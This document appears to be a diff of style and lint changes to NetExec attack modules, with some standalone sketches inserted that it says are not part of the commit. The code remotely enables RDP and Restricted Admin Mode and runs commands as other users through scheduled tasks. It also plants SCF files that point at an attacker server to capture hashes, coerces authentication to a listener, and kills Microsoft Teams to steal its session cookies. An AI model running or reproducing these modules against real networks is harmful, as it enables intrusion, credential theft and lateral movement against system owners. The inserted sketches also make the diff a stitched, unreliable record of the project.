iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
i_enum_wbem_class_object = i_wbem_services.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
||||||
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
|
i_wbem_class_object = i_enum_wbem_class_object.Next(0xFFFFFFFF, 1)[0]
|
||||||
result = dict(iWbemClassObject.getProperties())
|
result = dict(i_wbem_class_object.getProperties())
|
||||||
result = result['AllowTSConnections']['value']
|
result = result["AllowTSConnections"]["value"]
|
||||||
if result == 0:
|
if result == 0:
|
||||||
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully")
|
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully")
|
||||||
else:
|
else:
|
||||||
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully")
|
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully")
|
||||||
else:
|
else:
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
iEnumWbemClassObject = iWbemServices.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
i_enum_wbem_class_object = i_wbem_services.ExecQuery("SELECT * FROM Win32_TerminalServiceSetting")
|
||||||
iWbemClassObject = iEnumWbemClassObject.Next(0xffffffff,1)[0]
|
i_wbem_class_object = i_enum_wbem_class_object.Next(0xFFFFFFFF, 1)[0]
|
||||||
result = dict(iWbemClassObject.getProperties())
|
result = dict(i_wbem_class_object.getProperties())
|
||||||
result = result['AllowTSConnections']['value']
|
result = result["AllowTSConnections"]["value"]
|
||||||
if result == 0:
|
if result == 0:
|
||||||
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
|
self.logger.success("Disable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
|
||||||
else:
|
else:
|
||||||
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
|
self.logger.success("Enable RDP via WMI(ncacn_ip_tcp) successfully (old system)")
|
||||||
|
|
||||||
def query_RDPPort(self):
|
def query_rdp_port(self):
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/DEFAULT', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/DEFAULT", NULL, NULL)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
StdRegProv, resp = iWbemServices.GetObject("StdRegProv")
|
std_reg_prov, resp = i_wbem_services.GetObject("StdRegProv")
|
||||||
out = StdRegProv.GetDWORDValue(2147483650, 'SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp', 'PortNumber')
|
out = std_reg_prov.GetDWORDValue(2147483650, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp", "PortNumber")
|
||||||
self.logger.success(f"RDP Port: {str(out.uValue)}")
|
self.logger.success(f"RDP Port: {out.uValue!s}")
|
||||||
|
|
||||||
# Nt version under 6 not support RAM.
|
# Nt version under 6 not support RAM.
|
||||||
def rdp_RAMWrapper(self, action):
|
def rdp_ram_wrapper(self, action):
|
||||||
iWbemServices = self.__iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
|
i_wbem_services = self.__iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
||||||
self.__iWbemLevel1Login.RemRelease()
|
self.__iWbemLevel1Login.RemRelease()
|
||||||
StdRegProv, resp = iWbemServices.GetObject("StdRegProv")
|
std_reg_prov, resp = i_wbem_services.GetObject("StdRegProv")
|
||||||
if action == 'enable-ram':
|
if action == "enable-ram":
|
||||||
self.logger.info("Enabling Restricted Admin Mode.")
|
self.logger.info("Enabling Restricted Admin Mode.")
|
||||||
StdRegProv.SetDWORDValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin', 0)
|
std_reg_prov.SetDWORDValue(2147483650, "System\\CurrentControlSet\\Control\\Lsa", "DisableRestrictedAdmin", 0)
|
||||||
elif action == 'disable-ram':
|
elif action == "disable-ram":
|
||||||
self.logger.info("Disabling Restricted Admin Mode (Clear).")
|
self.logger.info("Disabling Restricted Admin Mode (Clear).")
|
||||||
StdRegProv.DeleteValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin')
|
std_reg_prov.DeleteValue(2147483650, "System\\CurrentControlSet\\Control\\Lsa", "DisableRestrictedAdmin")
|
||||||
out = StdRegProv.GetDWORDValue(2147483650, 'System\\CurrentControlSet\\Control\\Lsa', 'DisableRestrictedAdmin')
|
out = std_reg_prov.GetDWORDValue(2147483650, "System\\CurrentControlSet\\Control\\Lsa", "DisableRestrictedAdmin")
|
||||||
if out.uValue == 0:
|
if out.uValue == 0:
|
||||||
self.logger.success("Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
|
self.logger.success("Enable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
|
||||||
elif out.uValue == None:
|
elif out.uValue is None:
|
||||||
self.logger.success("Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
|
self.logger.success("Disable RDP Restricted Admin Mode via WMI(ncacn_ip_tcp) successfully")
|
||||||
|
|
|
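Aside from the renames, the SMB path of this module reduces to a single remote-registry write. The following standalone sketch is not part of the commit; it only restates that core step with the same impacket calls the diff already uses, assuming plaintext SMB credentials, and the host, username and password names are placeholders.

from impacket.smbconnection import SMBConnection
from impacket.examples.secretsdump import RemoteOperations
from impacket.dcerpc.v5 import rrp

def set_rdp_state(host, username, password, enable=True):
    # Sketch only: open SMB, bring up the remote registry pipe, flip fDenyTSConnections.
    smb = SMBConnection(host, host)
    smb.login(username, password)
    remote_ops = RemoteOperations(smb, False)
    remote_ops.enableRegistry()
    dce = remote_ops._RemoteOperations__rrp  # same private handle the module reaches into
    root = rrp.hOpenLocalMachine(dce)["phKey"]
    key = rrp.hBaseRegOpenKey(dce, root, "SYSTEM\\CurrentControlSet\\Control\\Terminal Server")["phkResult"]
    # fDenyTSConnections: 0 allows RDP connections, 1 denies them
    rrp.hBaseRegSetValue(dce, key, "fDenyTSConnections", rrp.REG_DWORD, 0 if enable else 1)
    _, value = rrp.hBaseRegQueryValue(dce, key, "fDenyTSConnections")
    remote_ops.finish()
    return int(value) == 0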
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5 import rrp
from impacket.examples.secretsdump import RemoteOperations

@@ -63,8 +60,8 @@ class NXCModule:
if "WORD" in self.type:
try:
self.value = int(self.value)
- except:
+ except Exception as e:
- context.log.fail(f"Invalid registry value type specified: {self.value}")
+ context.log.fail(f"Invalid registry value type specified: {self.value}: {e}")
return
if self.type in type_dict:
self.type = type_dict[self.type]

@@ -112,8 +109,8 @@ class NXCModule:
try:
# Check if value exists
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
- except:
+ except Exception as e:
- self.context.log.fail(f"Registry key {self.key} does not exist")
+ self.context.log.fail(f"Registry key {self.key} does not exist: {e}")
return
# Delete value
rrp.hBaseRegDeleteValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)

@@ -135,7 +132,7 @@ class NXCModule:
self.value,
)
self.context.log.success(f"Key {self.key} has been modified to {self.value}")
- except:
+ except Exception:
rrp.hBaseRegSetValue(
remote_ops._RemoteOperations__rrp,
key_handle,

@@ -150,7 +147,7 @@ class NXCModule:
try:
data_type, reg_value = rrp.hBaseRegQueryValue(remote_ops._RemoteOperations__rrp, key_handle, self.key)
self.context.log.highlight(f"{self.key}: {reg_value}")
- except:
+ except Exception:
if self.delete:
pass
else:
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

class NXCModule:
name = "runasppl"

@@ -17,10 +14,10 @@ class NXCModule:
""""""

def on_admin_login(self, context, connection):
- command = "reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
+ command = r"reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL"
- context.log.display("Executing command")
+ context.log.debug(f"Executing command: {command}")
p = connection.execute(command, True)
if "The system was unable to find the specified registry key or value" in p:
- context.log.debug(f"Unable to find RunAsPPL Registry Key")
+ context.log.debug("Unable to find RunAsPPL Registry Key")
else:
context.log.highlight(p)
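The module above only highlights the raw `reg query` output. A small helper like the sketch below, which is not in the commit, could turn that output into a verdict; the "RunAsPPL REG_DWORD 0x1" layout is an assumption about how reg.exe formats the value.

def runasppl_enabled(reg_output: str) -> bool:
    # Sketch only: parse the text the module already receives from `reg query`.
    if "The system was unable to find the specified registry key or value" in reg_output:
        return False
    for line in reg_output.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0] == "RunAsPPL" and parts[1] == "REG_DWORD":
            return int(parts[2], 16) == 1  # reg.exe prints the DWORD as hex, e.g. 0x1
    return False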
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

import os
from time import sleep
from datetime import datetime

@@ -21,7 +18,6 @@ class NXCModule:
CMD Command to execute
USER User to execute command as
"""

self.cmd = self.user = self.time = None
if "CMD" in module_options:
self.cmd = module_options["CMD"]

@@ -60,7 +56,7 @@ class NXCModule:
connection.hash,
self.logger,
connection.args.get_output_tries,
- "C$" # This one shouldn't be hardcoded but I don't know where to retrive the info
+ "C$", # This one shouldn't be hardcoded but I don't know where to retrieve the info
)

self.logger.display(f"Executing {self.cmd} as {self.user}")

@@ -70,7 +66,7 @@ class NXCModule:
if not isinstance(output, str):
output = output.decode(connection.args.codec)
except UnicodeDecodeError:
- # Required to decode specific french caracters otherwise it'll print b"<result>"
+ # Required to decode specific French characters otherwise it'll print b"<result>"
output = output.decode("cp437")
if output:
self.logger.highlight(output)

@@ -256,10 +252,10 @@ class TSCH_EXEC:
if fileless:
while True:
try:
- with open(os.path.join("/tmp", "nxc_hosted", self.__output_filename), "r") as output:
+ with open(os.path.join("/tmp", "nxc_hosted", self.__output_filename)) as output:
self.output_callback(output.read())
break
- except IOError:
+ except OSError:
sleep(2)
else:
smbConnection = self.__rpctransport.get_smb_connection()
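The decode fallback kept by the hunk above is worth spelling out on its own. A minimal sketch of the same pattern, separate from the module code:

def decode_output(raw: bytes, codec: str = "utf-8") -> str:
    # Try the codec configured on the connection first, then fall back to cp437 so
    # accented output from cmd.exe still decodes instead of printing b"<result>".
    try:
        return raw.decode(codec)
    except UnicodeDecodeError:
        return raw.decode("cp437")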
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

import ntpath
from sys import exit

@@ -52,11 +49,11 @@ class NXCModule:

if not self.cleanup:
self.server = module_options["SERVER"]
- scuf = open(self.scf_path, "a")
- scuf.write(f"[Shell]\n")
- scuf.write(f"Command=2\n")
- scuf.write(f"IconFile=\\\\{self.server}\\share\\icon.ico\n")
- scuf.close()
+ with open(self.scf_path, "a") as scuf:
+ scuf.write("[Shell]\n")
+ scuf.write("Command=2\n")
+ scuf.write(f"IconFile=\\\\{self.server}\\share\\icon.ico\n")

def on_login(self, context, connection):
shares = connection.shares()
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

import time
from impacket import system_errors
from impacket.dcerpc.v5 import transport

@@ -101,13 +98,9 @@ class DCERPCSessionError(DCERPCException):
if key in error_messages:
error_msg_short = error_messages[key][0]
error_msg_verbose = error_messages[key][1]
- return "SessionError: code: 0x%x - %s - %s" % (
- self.error_code,
- error_msg_short,
- error_msg_verbose,
- )
+ return f"SessionError: code: 0x{self.error_code:x} - {error_msg_short} - {error_msg_verbose}"
else:
- return "SessionError: unknown error code: 0x%x" % self.error_code
+ return f"SessionError: unknown error code: 0x{self.error_code:x}"


################################################################################

@@ -229,7 +222,7 @@ class CoerceAuth:
rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)

- nxc_logger.info("Connecting to %s" % binding_params[pipe]["stringBinding"])
+ nxc_logger.info(f"Connecting to {binding_params[pipe]['stringBinding']}")

try:
dce.connect()

@@ -239,14 +232,14 @@ class CoerceAuth:
dce.disconnect()
return 1

- nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
+ nxc_logger.debug(f"Something went wrong, check error status => {e!s}")

nxc_logger.info("Connected!")
- nxc_logger.info("Binding to %s" % binding_params[pipe]["UUID"][0])
+ nxc_logger.info(f"Binding to {binding_params[pipe]['UUID'][0]}")
try:
dce.bind(uuidtup_to_bin(binding_params[pipe]["UUID"]))
except Exception as e:
- nxc_logger.debug("Something went wrong, check error status => %s" % str(e))
+ nxc_logger.debug(f"Something went wrong, check error status => {e!s}")

nxc_logger.info("Successfully bound!")
return dce

@@ -257,8 +250,7 @@ class CoerceAuth:
request = IsPathShadowCopied()
# only NETLOGON and SYSVOL were detected working here
# setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)
- request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener
+ request["ShareName"] = f"\\\\{listener}\\NETLOGON\x00"
- # request.dump()
dce.request(request)
except Exception as e:
nxc_logger.debug("Something went wrong, check error status => %s", str(e))

@@ -273,7 +265,7 @@ class CoerceAuth:
request = IsPathSupported()
# only NETLOGON and SYSVOL were detected working here
# setting the share to something else raises a 0x80042308 (FSRVP_E_OBJECT_NOT_FOUND) or 0x8004230c (FSRVP_E_NOT_SUPPORTED)
- request["ShareName"] = "\\\\%s\\NETLOGON\x00" % listener
+ request["ShareName"] = f"\\\\{listener}\\NETLOGON\x00"
dce.request(request)
except Exception as e:
nxc_logger.debug("Something went wrong, check error status => %s", str(e))
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

import pylnk3
import ntpath
from sys import exit

@@ -33,7 +30,6 @@ class NXCModule:
NAME LNK file name
CLEANUP Cleanup (choices: True or False)
"""

self.cleanup = False

if "CLEANUP" in module_options:

(File diff suppressed because it is too large)
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

# https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/rpcdump.py
from impacket import uuid
from impacket.dcerpc.v5 import transport, epm

@@ -36,9 +33,7 @@ class NXCModule:
self.port = None

def options(self, context, module_options):
- """
- PORT Port to check (defaults to 135)
- """
+ """PORT Port to check (defaults to 135)"""
self.port = 135
if "PORT" in module_options:
self.port = int(module_options["PORT"])

@@ -49,7 +44,7 @@ class NXCModule:
nthash = getattr(connection, "nthash", "")

self.__stringbinding = KNOWN_PROTOCOLS[self.port]["bindstr"] % connection.host
- context.log.debug("StringBinding %s" % self.__stringbinding)
+ context.log.debug(f"StringBinding {self.__stringbinding}")
rpctransport = transport.DCERPCTransportFactory(self.__stringbinding)
rpctransport.set_credentials(connection.username, connection.password, connection.domain, lmhash, nthash)
rpctransport.setRemoteHost(connection.host if not connection.kerberos else connection.hostname + "." + connection.domain)

@@ -61,11 +56,11 @@ class NXCModule:
try:
entries = self.__fetch_list(rpctransport)
except Exception as e:
- error_text = "Protocol failed: %s" % e
+ error_text = f"Protocol failed: {e}"
context.log.critical(error_text)

if RPC_PROXY_INVALID_RPC_PORT_ERR in error_text or RPC_PROXY_RPC_OUT_DATA_404_ERR in error_text or RPC_PROXY_CONN_A1_404_ERR in error_text or RPC_PROXY_CONN_A1_0X6BA_ERR in error_text:
- context.log.critical("This usually means the target does not allow " "to connect to its epmapper using RpcProxy.")
+ context.log.critical("This usually means the target does not allow to connect to its epmapper using RpcProxy.")
return

# Display results.

@@ -76,27 +71,21 @@ class NXCModule:
tmp_uuid = str(entry["tower"]["Floors"][0])
if (tmp_uuid in endpoints) is not True:
endpoints[tmp_uuid] = {}
- endpoints[tmp_uuid]["Bindings"] = list()
+ endpoints[tmp_uuid]["Bindings"] = []
- if uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18] in epm.KNOWN_UUIDS:
- endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS[uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18]]
- else:
- endpoints[tmp_uuid]["EXE"] = "N/A"
+ endpoints[tmp_uuid]["EXE"] = epm.KNOWN_UUIDS.get(uuid.uuidtup_to_bin(uuid.string_to_uuidtup(tmp_uuid))[:18], "N/A")
endpoints[tmp_uuid]["annotation"] = entry["annotation"][:-1].decode("utf-8")
endpoints[tmp_uuid]["Bindings"].append(binding)

- if tmp_uuid[:36] in epm.KNOWN_PROTOCOLS:
- endpoints[tmp_uuid]["Protocol"] = epm.KNOWN_PROTOCOLS[tmp_uuid[:36]]
- else:
- endpoints[tmp_uuid]["Protocol"] = "N/A"
+ endpoints[tmp_uuid]["Protocol"] = epm.KNOWN_PROTOCOLS.get(tmp_uuid[:36], "N/A")

for endpoint in list(endpoints.keys()):
if "MS-RPRN" in endpoints[endpoint]["Protocol"]:
- context.log.debug("Protocol: %s " % endpoints[endpoint]["Protocol"])
+ context.log.debug(f"Protocol: {endpoints[endpoint]['Protocol']} ")
- context.log.debug("Provider: %s " % endpoints[endpoint]["EXE"])
+ context.log.debug(f"Provider: {endpoints[endpoint]['EXE']} ")
- context.log.debug("UUID : %s %s" % (endpoint, endpoints[endpoint]["annotation"]))
+ context.log.debug(f"UUID : {endpoint} {endpoints[endpoint]['annotation']}")
context.log.debug("Bindings: ")
for binding in endpoints[endpoint]["Bindings"]:
- context.log.debug(" %s" % binding)
+ context.log.debug(f" {binding}")
context.log.debug("")
context.log.highlight("Spooler service enabled")
try:

@@ -110,18 +99,18 @@ class NXCModule:
host.signing,
spooler=True,
)
- except Exception as e:
+ except Exception:
- context.log.debug(f"Error updating spooler status in database")
+ context.log.debug("Error updating spooler status in database")
break

if entries:
num = len(entries)
- if 1 == num:
+ if num == 1:
- context.log.debug(f"[Spooler] Received one endpoint")
+ context.log.debug("[Spooler] Received one endpoint")
else:
context.log.debug(f"[Spooler] Received {num} endpoints")
else:
- context.log.debug(f"[Spooler] No endpoints found")
+ context.log.debug("[Spooler] No endpoints found")

def __fetch_list(self, rpctransport):
dce = rpctransport.get_dce_rpc()
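For reference, the check this module performs boils down to an endpoint-mapper lookup followed by a scan for an MS-RPRN binding. The condensed standalone sketch below is not the module itself; it assumes anonymous access to the endpoint mapper on TCP/135 is allowed, whereas the module also sets credentials on the transport.

from impacket.dcerpc.v5 import transport, epm

def spooler_enabled(host: str, port: int = 135) -> bool:
    # Bind to the endpoint mapper and look for a Print Spooler (MS-RPRN) endpoint.
    stringbinding = f"ncacn_ip_tcp:{host}[{port}]"
    rpctransport = transport.DCERPCTransportFactory(stringbinding)
    dce = rpctransport.get_dce_rpc()
    dce.connect()
    try:
        entries = epm.hept_lookup(None, dce=dce)  # same lookup rpcdump.py performs
    finally:
        dce.disconnect()
    for entry in entries:
        tmp_uuid = str(entry["tower"]["Floors"][0])
        if "MS-RPRN" in epm.KNOWN_PROTOCOLS.get(tmp_uuid[:36], "N/A"):
            return True
    return False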
@@ -1,10 +1,9 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

from impacket.ldap import ldapasn1 as ldapasn1_impacket
+ from impacket.ldap.ldap import LDAPSearchError
+ import sys


- def searchResEntry_to_dict(results):
+ def search_res_entry_to_dict(results):
data = {}
for attr in results["attributes"]:
key = str(attr["type"])

@@ -22,10 +21,7 @@ class NXCModule:
"""

def options(self, context, module_options):
- """
- showservers Toggle printing of servers (default: true)
- """
+ """Showservers Toggle printing of servers (default: true)"""

self.showservers = True
self.base_dn = None

@@ -52,38 +48,40 @@ class NXCModule:

try:
list_sites = connection.ldapConnection.search(
- searchBase="CN=Configuration,%s" % dn,
+ searchBase=f"CN=Configuration,{dn}",
searchFilter="(objectClass=site)",
attributes=["distinguishedName", "name", "description"],
sizeLimit=999,
)
except LDAPSearchError as e:
context.log.fail(str(e))
- exit()
+ sys.exit()

for site in list_sites:
if isinstance(site, ldapasn1_impacket.SearchResultEntry) is not True:
continue
- site = searchResEntry_to_dict(site)
+ site = search_res_entry_to_dict(site)
site_dn = site["distinguishedName"]
site_name = site["name"]
site_description = ""
- if "description" in site.keys():
+ if "description" in site:
site_description = site["description"]

# Getting subnets of this site
list_subnets = connection.ldapConnection.search(
- searchBase="CN=Sites,CN=Configuration,%s" % dn,
+ searchBase=f"CN=Sites,CN=Configuration,{dn}",
- searchFilter="(siteObject=%s)" % site_dn,
+ searchFilter=f"(siteObject={site_dn})",
attributes=["distinguishedName", "name"],
sizeLimit=999,
)
if len([subnet for subnet in list_subnets if isinstance(subnet, ldapasn1_impacket.SearchResultEntry)]) == 0:
- context.log.highlight('Site "%s"' % site_name)
+ context.log.highlight(f'Site "{site_name}"')
else:
for subnet in list_subnets:
if isinstance(subnet, ldapasn1_impacket.SearchResultEntry) is not True:
continue
- subnet = searchResEntry_to_dict(subnet)
+ subnet = search_res_entry_to_dict(subnet)
- subnet_dn = subnet["distinguishedName"]
+ subnet["distinguishedName"]
subnet_name = subnet["name"]

if self.showservers:

@@ -96,28 +94,20 @@ class NXCModule:
)
if len([server for server in list_servers if isinstance(server, ldapasn1_impacket.SearchResultEntry)]) == 0:
if len(site_description) != 0:
- context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description))
+ context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name}) (description:"{site_description}")')
else:
- context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name))
+ context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name})')
else:
for server in list_servers:
if isinstance(server, ldapasn1_impacket.SearchResultEntry) is not True:
continue
- server = searchResEntry_to_dict(server)["cn"]
+ server = search_res_entry_to_dict(server)["cn"]
if len(site_description) != 0:
- context.log.highlight(
- 'Site "%s" (Subnet:%s) (description:"%s") (Server:%s)'
- % (
- site_name,
- subnet_name,
- site_description,
- server,
- )
- )
+ context.log.highlight(f"Site: '{site_name}' (Subnet:{subnet_name}) (description:'{site_description}') (Server:'{server}')")
else:
- context.log.highlight('Site "%s" (Subnet:%s) (Server:%s)' % (site_name, subnet_name, server))
+ context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name}) (Server:{server})')
else:
if len(site_description) != 0:
- context.log.highlight('Site "%s" (Subnet:%s) (description:"%s")' % (site_name, subnet_name, site_description))
+ context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name}) (description:"{site_description}")')
else:
- context.log.highlight('Site "%s" (Subnet:%s)' % (site_name, subnet_name))
+ context.log.highlight(f'Site "{site_name}" (Subnet:{subnet_name})')
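The two LDAP lookups above are easier to see in isolation. The sketch below uses ldap3 instead of the module's impacket LDAP connection, purely for illustration; the server, credentials (DOMAIN\user form for NTLM) and base DN are placeholders, and no LDAP filter escaping is done.

from ldap3 import Server, Connection, NTLM, SUBTREE

def list_sites_and_subnets(dc_host, user, password, base_dn="DC=example,DC=local"):
    # Same queries as the module: sites under CN=Configuration, then the subnets
    # whose siteObject attribute points at each site DN.
    conn = Connection(Server(f"ldap://{dc_host}"), user=user, password=password,
                      authentication=NTLM, auto_bind=True)
    conn.search(f"CN=Configuration,{base_dn}", "(objectClass=site)",
                search_scope=SUBTREE, attributes=["name"])
    sites = [(entry.entry_dn, str(entry.name)) for entry in conn.entries]
    for site_dn, site_name in sites:
        conn.search(f"CN=Sites,CN=Configuration,{base_dn}", f"(siteObject={site_dn})",
                    search_scope=SUBTREE, attributes=["name"])
        for subnet in conn.entries:
            print(f'Site "{site_name}" (Subnet:{subnet.name})')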
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

import sqlite3


@@ -17,7 +14,6 @@ class NXCModule:
def on_admin_login(self, context, connection):
context.log.display("Killing all Teams process to open the cookie file")
connection.execute("taskkill /F /T /IM teams.exe")
- # sleep(3)
found = 0
paths = connection.spider("C$", folder="Users", regex=["[a-zA-Z0-9]*"], depth=0)
with open("/tmp/teams_cookies2.txt", "wb") as f:

@@ -48,7 +44,7 @@ class NXCModule:
if row is None:
context.log.fail("No " + name + " present in Microsoft Teams Cookies database")
else:
- context.log.success("Succesfully extracted " + name + ": ")
+ context.log.success("Successfully extracted " + name + ": ")
context.log.success(row[0])
conn.close()
except Exception as e:
@@ -1,6 +1,3 @@
- #!/usr/bin/env python3
- # -*- coding: utf-8 -*-

from sys import exit


@@ -17,9 +14,7 @@ class NXCModule:
multiple_hosts = True

def options(self, context, module_options):
- """
- HOST Host to ping
- """
+ """HOST Host to ping"""
self.host = None

if "HOST" not in module_options:
Some files were not shown because too many files have changed in this diff.